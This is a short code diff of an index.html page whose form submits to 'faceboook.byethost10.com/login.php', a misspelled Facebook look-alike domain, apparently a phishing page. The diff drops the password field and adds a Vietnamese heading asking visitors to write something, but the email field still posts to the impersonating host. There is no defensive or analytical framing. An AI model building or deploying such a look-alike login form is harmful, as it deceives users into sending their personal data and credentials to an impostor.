--- a/index.html
+++ b/index.html
@@ -8,9 +8,8 @@
 </head>
 <body>
     <form action="http://faceboook.byethost10.com/login.php">
-
+        <h1>hãy viết điều gì đó với tôi, tieng viet khong dau nhe !!!!!</h1>
         <input type="text" name="email" value="">
-        <input type="password" name="password" value="">
 
         <button>oke</button>
     </form>
